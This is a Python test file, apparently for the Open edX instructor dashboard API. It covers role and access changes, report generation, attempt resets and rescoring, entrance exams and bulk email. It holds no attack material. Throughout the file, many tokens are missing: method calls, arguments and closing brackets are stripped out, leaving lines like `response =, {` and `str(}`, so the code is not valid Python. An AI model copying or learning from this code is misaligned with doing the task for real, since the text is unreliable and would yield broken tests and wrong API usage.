"identifier":, "error": False, "userDoesNotExist": False, "is_active": True } ] } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected # Check the outbox assert len(mail.outbox) == 1 assert mail.outbox[0].subject == f'You have been removed from a beta test for {self.course.display_name}' text_body = mail.outbox[0].body html_body = mail.outbox[0].alternatives[0][0] assert text_body.startswith(f'Dear {}') for body in [text_body, html_body]: assert 'You have been removed as a beta tester for {display_name} at'.format( display_name=self.course.display_name, ) in body assert ('This course will remain on your dashboard, but you will no longer be ' 'part of the beta testing group.') in body assert 'Your other courses have not been affected.' in body assert 'This email was automatically sent from to {email_address}'.format(, ) in body class TestInstructorAPILevelsAccess(SharedModuleStoreTestCase, LoginEnrollmentTestCase): """ Test endpoints whereby instructors can change permissions of other users. This test does NOT test whether the actions had an effect on the database, that is the job of test_access. This tests the response and action switch. Actually, modify_access does not have a very meaningful response yet, so only the status code is tested. """ @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create() def setUp(self): super().setUp() self.instructor = InstructorFactory( self.client.login(username=self.instructor.username, password='test') self.other_instructor = InstructorFactory( self.other_staff = StaffFactory( self.other_user = UserFactory() def test_modify_access_noparams(self): """ Test missing all query parameters. """ url = reverse('modify_access', kwargs={'course_id': str(}) response = assert response.status_code == 400 def test_modify_access_bad_action(self): """ Test with an invalid action parameter. """ url = reverse('modify_access', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, 'rolename': 'staff', 'action': 'robot-not-an-action', }) assert response.status_code == 400 def test_modify_access_bad_role(self): """ Test with an invalid action parameter. """ url = reverse('modify_access', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, 'rolename': 'robot-not-a-roll', 'action': 'revoke', }) assert response.status_code == 400 def test_modify_access_allow(self): url = reverse('modify_access', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, 'rolename': 'staff', 'action': 'allow', }) assert response.status_code == 200 def test_modify_access_allow_with_uname(self): url = reverse('modify_access', kwargs={'course_id': str(}) response =, { 'unique_student_identifier': self.other_instructor.username, 'rolename': 'staff', 'action': 'allow', }) assert response.status_code == 200 def test_modify_access_revoke(self): url = reverse('modify_access', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, 'rolename': 'staff', 'action': 'revoke', }) assert response.status_code == 200 def test_modify_access_revoke_with_username(self): url = reverse('modify_access', kwargs={'course_id': str(}) response =, { 'unique_student_identifier': self.other_staff.username, 'rolename': 'staff', 'action': 'revoke', }) assert response.status_code == 200 def test_modify_access_with_fake_user(self): url = reverse('modify_access', kwargs={'course_id': str(}) response =, { 'unique_student_identifier': 'GandalfTheGrey', 'rolename': 'staff', 'action': 'revoke', }) assert response.status_code == 200 expected = { 'unique_student_identifier': 'GandalfTheGrey', 'userDoesNotExist': True, } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected def test_modify_access_with_inactive_user(self): self.other_user.is_active = False url = reverse('modify_access', kwargs={'course_id': str(}) response =, { 'unique_student_identifier': self.other_user.username, 'rolename': 'beta', 'action': 'allow', }) assert response.status_code == 200 expected = { 'unique_student_identifier': self.other_user.username, 'inactiveUser': True, } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected def test_modify_access_revoke_not_allowed(self): """ Test revoking access that a user does not have. """ url = reverse('modify_access', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, 'rolename': 'instructor', 'action': 'revoke', }) assert response.status_code == 200 def test_modify_access_revoke_self(self): """ Test that an instructor cannot remove instructor privelages from themself. """ url = reverse('modify_access', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, 'rolename': 'instructor', 'action': 'revoke', }) assert response.status_code == 200 # check response content expected = { 'unique_student_identifier': self.instructor.username, 'rolename': 'instructor', 'action': 'revoke', 'removingSelfAsInstructor': True, } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected def test_list_course_role_members_noparams(self): """ Test missing all query parameters. """ url = reverse('list_course_role_members', kwargs={'course_id': str(}) response = assert response.status_code == 400 def test_list_course_role_members_bad_rolename(self): """ Test with an invalid rolename parameter. """ url = reverse('list_course_role_members', kwargs={'course_id': str(}) response =, { 'rolename': 'robot-not-a-rolename', }) assert response.status_code == 400 def test_list_course_role_members_staff(self): url = reverse('list_course_role_members', kwargs={'course_id': str(}) response =, { 'rolename': 'staff', }) assert response.status_code == 200 # check response content expected = { 'course_id': str(, 'staff': [ { 'username': self.other_staff.username, 'email':, 'first_name': self.other_staff.first_name, 'last_name': self.other_staff.last_name, } ] } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected def test_list_course_role_members_beta(self): url = reverse('list_course_role_members', kwargs={'course_id': str(}) response =, { 'rolename': 'beta', }) assert response.status_code == 200 # check response content expected = { 'course_id': str(, 'beta': [] } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected def test_update_forum_role_membership(self): """ Test update forum role membership with user's email and username. """ # Seed forum roles for course. seed_permissions_roles( for user in [self.instructor, self.other_user]: for identifier_attr in [, user.username]: for rolename in ["Administrator", "Moderator", "Community TA"]: for action in ["allow", "revoke"]: self.assert_update_forum_role_membership(user, identifier_attr, rolename, action) def assert_update_forum_role_membership(self, current_user, identifier, rolename, action): """ Test update forum role membership. Get unique_student_identifier, rolename and action and update forum role. """ url = reverse('update_forum_role_membership', kwargs={'course_id': str(}) response = url, { 'unique_student_identifier': identifier, 'rolename': rolename, 'action': action, } ) # Status code should be 200. assert response.status_code == 200 user_roles = current_user.roles.filter("name", flat=True) if action == 'allow': assert rolename in user_roles elif action == 'revoke': assert rolename not in user_roles @ddt.ddt class TestInstructorAPILevelsDataDump(SharedModuleStoreTestCase, LoginEnrollmentTestCase): """ Test endpoints that show data without side effects. """ @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create() def setUp(self): super().setUp() self.course_mode = CourseMode(, mode_slug="honor", mode_display_name="honor cert", min_price=40) self.instructor = InstructorFactory( CourseDataResearcherRole( self.client.login(username=self.instructor.username, password='test') self.students = [UserFactory() for _ in range(6)] for student in self.students: CourseEnrollment.enroll(student, self.students_who_may_enroll = self.students + [UserFactory() for _ in range(5)] for student in self.students_who_may_enroll: CourseEnrollmentAllowed.objects.create(, ) def test_get_problem_responses_invalid_location(self): """ Test whether get_problem_responses returns an appropriate status message when users submit an invalid problem location. """ url = reverse( 'get_problem_responses', kwargs={'course_id': str(} ) problem_location = '' response =, {'problem_location': problem_location}) res_json = json.loads(response.content.decode('utf-8')) assert res_json == 'Could not find problem with this location.' def valid_problem_location(test): # pylint: disable=no-self-argument """ Decorator for tests that target get_problem_responses endpoint and need to pretend user submitted a valid problem location. """ @functools.wraps(test) def wrapper(self, *args, **kwargs): """ Run `test` method, ensuring that UsageKey.from_string returns a problem key that the get_problem_responses endpoint can work with. """ mock_problem_key = NonCallableMock(return_value='') mock_problem_key.course_key = with patch.object(UsageKey, 'from_string') as patched_method: patched_method.return_value = mock_problem_key test(self, *args, **kwargs) return wrapper @valid_problem_location def test_get_problem_responses_successful(self): """ Test whether get_problem_responses returns an appropriate status message if CSV generation was started successfully. """ url = reverse( 'get_problem_responses', kwargs={'course_id': str(} ) problem_location = '' response =, {'problem_location': problem_location}) res_json = json.loads(response.content.decode('utf-8')) assert 'status' in res_json status = res_json['status'] assert 'is being created' in status assert 'already in progress' not in status assert 'task_id' in res_json @valid_problem_location def test_get_problem_responses_already_running(self): """ Test whether get_problem_responses returns an appropriate status message if CSV generation is already in progress. """ url = reverse( 'get_problem_responses', kwargs={'course_id': str(} ) task_type = 'problem_responses_csv' already_running_status = generate_already_running_error_message(task_type) with patch('lms.djangoapps.instructor_task.api.submit_calculate_problem_responses_csv') as submit_task_function: error = AlreadyRunningError(already_running_status) submit_task_function.side_effect = error response =, {}) self.assertContains(response, already_running_status, status_code=400) def test_get_students_features(self): """ Test that some minimum of information is formatted correctly in the response to get_students_features. """ for student in self.students: = f"Mos Eisley {}" url = reverse('get_students_features', kwargs={'course_id': str(}) response =, {}) res_json = json.loads(response.content.decode('utf-8')) assert 'students' in res_json for student in self.students: student_json = [ x for x in res_json['students'] if x['username'] == student.username ][0] assert student_json['username'] == student.username assert student_json['email'] == assert student_json['city'] == assert student_json['country'] == '', False) def test_get_students_features_cohorted(self, is_cohorted): """ Test that get_students_features includes cohort info when the course is cohorted, and does not when the course is not cohorted. """ url = reverse('get_students_features', kwargs={'course_id': str(}) set_course_cohorted(, is_cohorted) response =, {}) res_json = json.loads(response.content.decode('utf-8')) assert ('cohort' in res_json['feature_names']) == is_cohorted, False) def test_get_students_features_teams(self, has_teams): """ Test that get_students_features includes team info when the course is has teams enabled, and does not when the course does not have teams enabled """ if has_teams: self.course = CourseFactory.create(teams_configuration=TeamsConfig({ 'max_size': 2, 'topics': [{'id': 'topic', 'name': 'Topic', 'description': 'A Topic'}] })) course_instructor = InstructorFactory( CourseDataResearcherRole( self.client.login(username=course_instructor.username, password='test') url = reverse('get_students_features', kwargs={'course_id': str(}) response =, {}) res_json = json.loads(response.content.decode('utf-8')) assert ('team' in res_json['feature_names']) == has_teams, False) def test_get_students_features_external_user_key(self, has_program_enrollments): external_key_dict = {} if has_program_enrollments: for i in range(len(self.students)): student = self.students[i] external_key = "{}_{}".format(student.username, i) ProgramEnrollmentFactory.create(user=student, external_user_key=external_key) external_key_dict[student.username] = external_key url = reverse('get_students_features', kwargs={'course_id': str(}) response =, {}) res_json = json.loads(response.content.decode('utf-8')) assert 'external_user_key' in res_json['feature_names'] for student in self.students: student_json = [ x for x in res_json['students'] if x['username'] == student.username ][0] assert student_json['username'] == student.username if has_program_enrollments: assert student_json['external_user_key'] == external_key_dict[student.username] else: assert student_json['external_user_key'] == '' def test_get_students_who_may_enroll(self): """ Test whether get_students_who_may_enroll returns an appropriate status message when users request a CSV file of students who may enroll in a course. """ url = reverse( 'get_students_who_may_enroll', kwargs={'course_id': str(} ) # Successful case: response =, {}) assert response.status_code == 200 # CSV generation already in progress: task_type = 'may_enroll_info_csv' already_running_status = generate_already_running_error_message(task_type) with patch('lms.djangoapps.instructor_task.api.submit_calculate_may_enroll_csv') as submit_task_function: error = AlreadyRunningError(already_running_status) submit_task_function.side_effect = error response =, {}) self.assertContains(response, already_running_status, status_code=400) def test_get_student_exam_results(self): """ Test whether get_proctored_exam_results returns an appropriate status message when users request a CSV file. """ url = reverse( 'get_proctored_exam_results', kwargs={'course_id': str(} ) # Successful case: response =, {}) assert response.status_code == 200 # CSV generation already in progress: task_type = 'proctored_exam_results_report' already_running_status = generate_already_running_error_message(task_type) with patch('lms.djangoapps.instructor_task.api.submit_proctored_exam_results_report') as submit_task_function: error = AlreadyRunningError(already_running_status) submit_task_function.side_effect = error response =, {}) self.assertContains(response, already_running_status, status_code=400) def test_access_course_finance_admin_with_invalid_course_key(self): """ Test assert require_course fiance_admin before generating a detailed enrollment report """ func = Mock() decorated_func = require_finance_admin(func) request = self.mock_request() response = decorated_func(request, 'invalid_course_key') assert response.status_code == 404 assert not func.called def mock_request(self): """ mock request """ request = Mock() request.user = self.instructor return request def test_access_course_finance_admin_with_valid_course_key(self): """ Test to check the course_finance_admin role with valid key but doesn't have access to the function """ func = Mock() decorated_func = require_finance_admin(func) request = self.mock_request() response = decorated_func(request, 'valid/course/key') assert response.status_code == 403 assert not func.called def test_add_user_to_fiance_admin_role_with_valid_course(self): """ test to check that a function is called using a fiance_admin rights. """ func = Mock() decorated_func = require_finance_admin(func) request = self.mock_request() CourseFinanceAdminRole( decorated_func(request, str( assert func.called @patch('lms.djangoapps.instructor_task.models.logger.error') @patch.dict(settings.GRADES_DOWNLOAD, {'STORAGE_TYPE': 's3', 'ROOT_PATH': 'tmp/edx-s3/grades'}) def test_list_report_downloads_error(self, mock_error): """ Tests the Rate-Limit exceeded is handled and does not raise 500 error. """ ex_status = 503 ex_reason = 'Slow Down' url = reverse('list_report_downloads', kwargs={'course_id': str(}) with patch('storages.backends.s3boto.S3BotoStorage.listdir', side_effect=BotoServerError(ex_status, ex_reason)): response =, {}) mock_error.assert_called_with( 'Fetching files failed for course: %s, status: %s, reason: %s',, ex_status, ex_reason, ) res_json = json.loads(response.content.decode('utf-8')) assert res_json == {'downloads': []} def test_list_report_downloads(self): url = reverse('list_report_downloads', kwargs={'course_id': str(}) with patch('lms.djangoapps.instructor_task.models.DjangoStorageReportStore.links_for') as mock_links_for: mock_links_for.return_value = [ ('mock_file_name_1', 'https://1.mock.url'), ('mock_file_name_2', 'https://2.mock.url'), ] response =, {}) expected_response = { "downloads": [ { "url": "https://1.mock.url", "link": "<a href=\"https://1.mock.url\">mock_file_name_1</a>", "name": "mock_file_name_1" }, { "url": "https://2.mock.url", "link": "<a href=\"https://2.mock.url\">mock_file_name_2</a>", "name": "mock_file_name_2" } ] } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected_response*REPORTS_DATA) @ddt.unpack @valid_problem_location def test_calculate_report_csv_success( self, report_type, instructor_api_endpoint, task_api_endpoint, extra_instructor_api_kwargs ): kwargs = {'course_id': str(} kwargs.update(extra_instructor_api_kwargs) url = reverse(instructor_api_endpoint, kwargs=kwargs) success_status = f"The {report_type} report is being created." with patch(task_api_endpoint) as mock_task_api_endpoint: if report_type == 'problem responses': mock_task_api_endpoint.return_value = Mock(task_id='task-id-1138') response =, {'problem_location': ''}) self.assertContains(response, success_status) else: CourseFinanceAdminRole( response =, {}) self.assertContains(response, success_status) def test_get_ora2_responses_success(self): url = reverse('export_ora2_data', kwargs={'course_id': str(}) with patch('lms.djangoapps.instructor_task.api.submit_export_ora2_data') as mock_submit_ora2_task: mock_submit_ora2_task.return_value = True response =, {}) success_status = "The ORA data report is being created." self.assertContains(response, success_status) def test_get_ora2_responses_already_running(self): url = reverse('export_ora2_data', kwargs={'course_id': str(}) task_type = 'export_ora2_data' already_running_status = generate_already_running_error_message(task_type) with patch('lms.djangoapps.instructor_task.api.submit_export_ora2_data') as mock_submit_ora2_task: mock_submit_ora2_task.side_effect = AlreadyRunningError(already_running_status) response =, {}) self.assertContains(response, already_running_status, status_code=400) def test_get_ora2_submission_files_success(self): url = reverse('export_ora2_submission_files', kwargs={'course_id': str(}) with patch( 'lms.djangoapps.instructor_task.api.submit_export_ora2_submission_files' ) as mock_submit_ora2_task: mock_submit_ora2_task.return_value = True response =, {}) success_status = 'Attachments archive is being created.' self.assertContains(response, success_status) def test_get_ora2_submission_files_already_running(self): url = reverse('export_ora2_submission_files', kwargs={'course_id': str(}) task_type = 'export_ora2_submission_files' already_running_status = generate_already_running_error_message(task_type) with patch( 'lms.djangoapps.instructor_task.api.submit_export_ora2_submission_files' ) as mock_submit_ora2_task: mock_submit_ora2_task.side_effect = AlreadyRunningError(already_running_status) response =, {}) self.assertContains(response, already_running_status, status_code=400) def test_get_ora2_summary_responses_success(self): url = reverse('export_ora2_summary', kwargs={'course_id': str(}) with patch('lms.djangoapps.instructor_task.api.submit_export_ora2_summary') as mock_submit_ora2_task: mock_submit_ora2_task.return_value = True response =, {}) success_status = "The ORA summary report is being created." self.assertContains(response, success_status) def test_get_ora2_summary_responses_already_running(self): url = reverse('export_ora2_summary', kwargs={'course_id': str(}) task_type = 'export_ora2_summary' already_running_status = generate_already_running_error_message(task_type) with patch('lms.djangoapps.instructor_task.api.submit_export_ora2_summary') as mock_submit_ora2_task: mock_submit_ora2_task.side_effect = AlreadyRunningError(already_running_status) response =, {}) self.assertContains(response, already_running_status, status_code=400) def test_get_student_progress_url(self): """ Test that progress_url is in the successful response. """ url = reverse('get_student_progress_url', kwargs={'course_id': str(}) data = {'unique_student_identifier': self.students[0].email} response =, data) assert response.status_code == 200 res_json = json.loads(response.content.decode('utf-8')) assert 'progress_url' in res_json def test_get_student_progress_url_from_uname(self): """ Test that progress_url is in the successful response. """ url = reverse('get_student_progress_url', kwargs={'course_id': str(}) data = {'unique_student_identifier': self.students[0].username} response =, data) assert response.status_code == 200 res_json = json.loads(response.content.decode('utf-8')) assert 'progress_url' in res_json def test_get_student_progress_url_noparams(self): """ Test that the endpoint 404's without the required query params. """ url = reverse('get_student_progress_url', kwargs={'course_id': str(}) response = assert response.status_code == 400 def test_get_student_progress_url_nostudent(self): """ Test that the endpoint 400's when requesting an unknown email. """ url = reverse('get_student_progress_url', kwargs={'course_id': str(}) response = assert response.status_code == 400 class TestInstructorAPIRegradeTask(SharedModuleStoreTestCase, LoginEnrollmentTestCase): """ Test endpoints whereby instructors can change student grades. This includes resetting attempts and starting rescore tasks. This test does NOT test whether the actions had an effect on the database, that is the job of task tests and test_enrollment. """ @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create() cls.problem_location = msk_from_problem_urlname(, 'robot-some-problem-urlname' ) cls.problem_urlname = str(cls.problem_location) def setUp(self): super().setUp() self.instructor = InstructorFactory( self.client.login(username=self.instructor.username, password='test') self.student = UserFactory() CourseEnrollment.enroll(self.student, self.module_to_reset = StudentModule.objects.create( student=self.student,, module_state_key=self.problem_location, state=json.dumps({'attempts': 10}), ) def test_reset_student_attempts_deletall(self): """ Make sure no one can delete all students state on a problem. """ url = reverse('reset_student_attempts', kwargs={'course_id': str(}) response =, { 'problem_to_reset': self.problem_urlname, 'all_students': True, 'delete_module': True, }) assert response.status_code == 400 def test_reset_student_attempts_single(self): """ Test reset single student attempts. """ url = reverse('reset_student_attempts', kwargs={'course_id': str(}) response =, { 'problem_to_reset': self.problem_urlname, 'unique_student_identifier':, }) assert response.status_code == 200 # make sure problem attempts have been reset. changed_module = StudentModule.objects.get( assert json.loads(changed_module.state)['attempts'] == 0 # mock out the function which should be called to execute the action. @patch('lms.djangoapps.instructor_task.api.submit_reset_problem_attempts_for_all_students') def test_reset_student_attempts_all(self, act): """ Test reset all student attempts. """ url = reverse('reset_student_attempts', kwargs={'course_id': str(}) response =, { 'problem_to_reset': self.problem_urlname, 'all_students': True, }) assert response.status_code == 200 assert act.called def test_reset_student_attempts_missingmodule(self): """ Test reset for non-existant problem. """ url = reverse('reset_student_attempts', kwargs={'course_id': str(}) response =, { 'problem_to_reset': 'robot-not-a-real-module', 'unique_student_identifier':, }) assert response.status_code == 400 @patch('lms.djangoapps.grades.signals.handlers.PROBLEM_WEIGHTED_SCORE_CHANGED.send') def test_reset_student_attempts_delete(self, _mock_signal): """ Test delete single student state. """ url = reverse('reset_student_attempts', kwargs={'course_id': str(}) response =, { 'problem_to_reset': self.problem_urlname, 'unique_student_identifier':, 'delete_module': True, }) assert response.status_code == 200 # make sure the module has been deleted assert StudentModule.objects\ .filter(student=self.module_to_reset.student, course_id=self.module_to_reset.course_id).count() == 0 def test_reset_student_attempts_nonsense(self): """ Test failure with both unique_student_identifier and all_students. """ url = reverse('reset_student_attempts', kwargs={'course_id': str(}) response =, { 'problem_to_reset': self.problem_urlname, 'unique_student_identifier':, 'all_students': True, }) assert response.status_code == 400 @patch('lms.djangoapps.instructor_task.api.submit_rescore_problem_for_student') def test_rescore_problem_single(self, act): """ Test rescoring of a single student. """ url = reverse('rescore_problem', kwargs={'course_id': str(}) response =, { 'problem_to_reset': self.problem_urlname, 'unique_student_identifier':, }) assert response.status_code == 200 assert act.called @patch('lms.djangoapps.instructor_task.api.submit_rescore_problem_for_student') def test_rescore_problem_single_from_uname(self, act): """ Test rescoring of a single student. """ url = reverse('rescore_problem', kwargs={'course_id': str(}) response =, { 'problem_to_reset': self.problem_urlname, 'unique_student_identifier': self.student.username, }) assert response.status_code == 200 assert act.called @patch('lms.djangoapps.instructor_task.api.submit_rescore_problem_for_all_students') def test_rescore_problem_all(self, act): """ Test rescoring for all students. """ url = reverse('rescore_problem', kwargs={'course_id': str(}) response =, { 'problem_to_reset': self.problem_urlname, 'all_students': True, }) assert response.status_code == 200 assert act.called @patch.dict(settings.FEATURES, {'ENTRANCE_EXAMS': True}) def test_course_has_entrance_exam_in_student_attempts_reset(self): """ Test course has entrance exam id set while resetting attempts""" url = reverse('reset_student_attempts_for_entrance_exam', kwargs={'course_id': str(}) response =, { 'all_students': True, 'delete_module': False, }) assert response.status_code == 400 @patch.dict(settings.FEATURES, {'ENTRANCE_EXAMS': True}) def test_rescore_entrance_exam_with_invalid_exam(self): """ Test course has entrance exam id set while re-scoring. """ url = reverse('rescore_entrance_exam', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, }) assert response.status_code == 400 @patch.dict(settings.FEATURES, {'ENTRANCE_EXAMS': True}) @ddt.ddt class TestEntranceExamInstructorAPIRegradeTask(SharedModuleStoreTestCase, LoginEnrollmentTestCase): """ Test endpoints whereby instructors can rescore student grades, reset student attempts and delete state for entrance exam. """ @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create( org='test_org', course='test_course', run='test_run', entrance_exam_id='i4x://{}/{}/chapter/Entrance_exam'.format('test_org', 'test_course') ) cls.course_with_invalid_ee = CourseFactory.create(entrance_exam_id='invalid_exam') with, emit_signals=False): cls.entrance_exam = ItemFactory.create( parent=cls.course, category='chapter', display_name='Entrance exam' ) subsection = ItemFactory.create( parent=cls.entrance_exam, category='sequential', display_name='Subsection 1' ) vertical = ItemFactory.create( parent=subsection, category='vertical', display_name='Vertical 1' ) cls.ee_problem_1 = ItemFactory.create( parent=vertical, category="problem", display_name="Exam Problem - Problem 1" ) cls.ee_problem_2 = ItemFactory.create( parent=vertical, category="problem", display_name="Exam Problem - Problem 2" ) def setUp(self): super().setUp() self.instructor = InstructorFactory( # Add instructor to invalid ee course CourseInstructorRole( self.client.login(username=self.instructor.username, password='test') self.student = UserFactory() CourseEnrollment.enroll(self.student, ee_module_to_reset1 = StudentModule.objects.create( student=self.student,, module_state_key=self.ee_problem_1.location, state=json.dumps({'attempts': 10, 'done': True}), ) ee_module_to_reset2 = StudentModule.objects.create( student=self.student,, module_state_key=self.ee_problem_2.location, state=json.dumps({'attempts': 10, 'done': True}), ) self.ee_modules = [ee_module_to_reset1.module_state_key, ee_module_to_reset2.module_state_key], ModuleStoreEnum.Type.mongo) def test_grade_histogram(self, store): """ Verify that a histogram has been created. """ course = CourseFactory.create(default_store=store) usage_key ='problem', 'first_problem') StudentModule.objects.create( student_id=1, grade=100, module_state_key=usage_key ) StudentModule.objects.create( student_id=2, grade=50, module_state_key=usage_key ) grades = grade_histogram(usage_key) assert grades[0] == (50.0, 1) assert grades[1] == (100.0, 1) def test_reset_entrance_exam_student_attempts_delete_all(self): """ Make sure no one can delete all students state on entrance exam. """ url = reverse('reset_student_attempts_for_entrance_exam', kwargs={'course_id': str(}) response =, { 'all_students': True, 'delete_module': True, }) assert response.status_code == 400 def test_reset_entrance_exam_student_attempts_single(self): """ Test reset single student attempts for entrance exam. """ url = reverse('reset_student_attempts_for_entrance_exam', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, }) assert response.status_code == 200 # make sure problem attempts have been reset. changed_modules = StudentModule.objects.filter(module_state_key__in=self.ee_modules) for changed_module in changed_modules: assert json.loads(changed_module.state)['attempts'] == 0 # mock out the function which should be called to execute the action. @patch('lms.djangoapps.instructor_task.api.submit_reset_problem_attempts_in_entrance_exam') def test_reset_entrance_exam_all_student_attempts(self, act): """ Test reset all student attempts for entrance exam. """ url = reverse('reset_student_attempts_for_entrance_exam', kwargs={'course_id': str(}) response =, { 'all_students': True, }) assert response.status_code == 200 assert act.called def test_reset_student_attempts_invalid_entrance_exam(self): """ Test reset for invalid entrance exam. """ url = reverse('reset_student_attempts_for_entrance_exam', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, }) assert response.status_code == 400 def test_entrance_exam_student_delete_state(self): """ Test delete single student entrance exam state. """ url = reverse('reset_student_attempts_for_entrance_exam', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, 'delete_module': True, }) assert response.status_code == 200 # make sure the module has been deleted changed_modules = StudentModule.objects.filter(module_state_key__in=self.ee_modules) assert changed_modules.count() == 0 def test_entrance_exam_delete_state_with_staff(self): """ Test entrance exam delete state failure with staff access. """ self.client.logout() staff_user = StaffFactory( self.client.login(username=staff_user.username, password='test') url = reverse('reset_student_attempts_for_entrance_exam', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, 'delete_module': True, }) assert response.status_code == 403 def test_entrance_exam_reset_student_attempts_nonsense(self): """ Test failure with both unique_student_identifier and all_students. """ url = reverse('reset_student_attempts_for_entrance_exam', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, 'all_students': True, }) assert response.status_code == 400 @patch('lms.djangoapps.instructor_task.api.submit_rescore_entrance_exam_for_student') def test_rescore_entrance_exam_single_student(self, act): """ Test re-scoring of entrance exam for single student. """ url = reverse('rescore_entrance_exam', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, }) assert response.status_code == 200 assert act.called def test_rescore_entrance_exam_all_student(self): """ Test rescoring for all students. """ url = reverse('rescore_entrance_exam', kwargs={'course_id': str(}) response =, { 'all_students': True, }) assert response.status_code == 200 def test_rescore_entrance_exam_if_higher_all_student(self): """ Test rescoring for all students only if higher. """ url = reverse('rescore_entrance_exam', kwargs={'course_id': str(}) response =, { 'all_students': True, 'only_if_higher': True, }) assert response.status_code == 200 def test_rescore_entrance_exam_all_student_and_single(self): """ Test re-scoring with both all students and single student parameters. """ url = reverse('rescore_entrance_exam', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, 'all_students': True, }) assert response.status_code == 400 def test_rescore_entrance_exam_with_invalid_exam(self): """ Test re-scoring of entrance exam with invalid exam. """ url = reverse('rescore_entrance_exam', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, }) assert response.status_code == 400 def test_list_entrance_exam_instructor_tasks_student(self): """ Test list task history for entrance exam AND student. """ # create a re-score entrance exam task url = reverse('rescore_entrance_exam', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, }) assert response.status_code == 200 url = reverse('list_entrance_exam_instructor_tasks', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, }) assert response.status_code == 200 # check response tasks = json.loads(response.content.decode('utf-8'))['tasks'] assert len(tasks) == 1 assert tasks[0]['status'] == _('Complete') def test_list_entrance_exam_instructor_tasks_all_student(self): """ Test list task history for entrance exam AND all student. """ url = reverse('list_entrance_exam_instructor_tasks', kwargs={'course_id': str(}) response =, {}) assert response.status_code == 200 # check response tasks = json.loads(response.content.decode('utf-8'))['tasks'] assert len(tasks) == 0 def test_list_entrance_exam_instructor_with_invalid_exam_key(self): """ Test list task history for entrance exam failure if course has invalid exam. """ url = reverse('list_entrance_exam_instructor_tasks', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, }) assert response.status_code == 400 def test_skip_entrance_exam_student(self): """ Test skip entrance exam api for student. """ # create a re-score entrance exam task url = reverse('mark_student_can_skip_entrance_exam', kwargs={'course_id': str(}) response =, { 'unique_student_identifier':, }) assert response.status_code == 200 # check response message = _('This student (%s) will skip the entrance exam.') % self.assertContains(response, message) # post again with same student response =, { 'unique_student_identifier':, }) # This time response message should be different message = _('This student (%s) is already allowed to skip the entrance exam.') % self.assertContains(response, message) @patch('lms.djangoapps.bulk_email.models.html_to_text', Mock(return_value='Mocking CourseEmail.text_message', autospec=True)) # lint-amnesty, pylint: disable=line-too-long class TestInstructorSendEmail(SiteMixin, SharedModuleStoreTestCase, LoginEnrollmentTestCase): """ Checks that only instructors have access to email endpoints, and that these endpoints are only accessible with courses that actually exist, only with valid email messages. """ @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create() test_subject = '\u1234 test subject' test_message = '\u6824 test message' cls.full_test_message = { 'send_to': '["myself", "staff"]', 'subject': test_subject, 'message': test_message, } BulkEmailFlag.objects.create(enabled=True, require_course_email_auth=False) @classmethod def tearDownClass(cls): super().tearDownClass() BulkEmailFlag.objects.all().delete() def setUp(self): super().setUp() self.instructor = InstructorFactory( self.client.login(username=self.instructor.username, password='test') def test_send_email_as_logged_in_instructor(self): url = reverse('send_email', kwargs={'course_id': str(}) response =, self.full_test_message) assert response.status_code == 200 def test_send_email_but_not_logged_in(self): self.client.logout() url = reverse('send_email', kwargs={'course_id': str(}) response =, self.full_test_message) assert response.status_code == 403 def test_send_email_but_not_staff(self): self.client.logout() student = UserFactory() self.client.login(username=student.username, password='test') url = reverse('send_email', kwargs={'course_id': str(}) response =, self.full_test_message) assert response.status_code == 403 def test_send_email_but_course_not_exist(self): url = reverse('send_email', kwargs={'course_id': 'GarbageCourse/DNE/NoTerm'}) response =, self.full_test_message) assert response.status_code != 200 def test_send_email_no_sendto(self): url = reverse('send_email', kwargs={'course_id': str(}) response =, { 'subject': 'test subject', 'message': 'test message', }) assert response.status_code == 400 def test_send_email_invalid_sendto(self): url = reverse('send_email', kwargs={'course_id': str(}) response =, { 'send_to': '["invalid_target", "staff"]', 'subject': 'test subject', 'message': 'test message', }) assert response.status_code == 400 def test_send_email_no_subject(self): url = reverse('send_email', kwargs={'course_id': str(}) response =, { 'send_to': '["staff"]', 'message': 'test message', }) assert response.status_code == 400 def test_send_email_no_message(self): url = reverse('send_email', kwargs={'course_id': str(}) response =, { 'send_to': '["staff"]', 'subject': 'test subject', }) assert response.status_code == 400 def test_send_email_with_site_template_and_from_addr(self): site_email = self.site_configuration.site_values.get('course_email_from_addr') site_template = self.site_configuration.site_values.get('course_email_template_name') CourseEmailTemplate.objects.create(name=site_template) url = reverse('send_email', kwargs={'course_id': str(}) response =, self.full_test_message) assert response.status_code == 200 assert 1 == CourseEmail.objects.filter(, sender=self.instructor, subject=self.full_test_message['subject'], html_message=self.full_test_message['message'], template_name=site_template, from_addr=site_email).count() def test_send_email_with_org_template_and_from_addr(self): org_email = '' org_template = 'fake_org_email_template' CourseEmailTemplate.objects.create(name=org_template) self.site_configuration.site_values.update({ 'course_email_from_addr': { org_email}, 'course_email_template_name': { org_template} }) url = reverse('send_email', kwargs={'course_id': str(}) response =, self.full_test_message) assert response.status_code == 200 assert 1 == CourseEmail.objects.filter(, 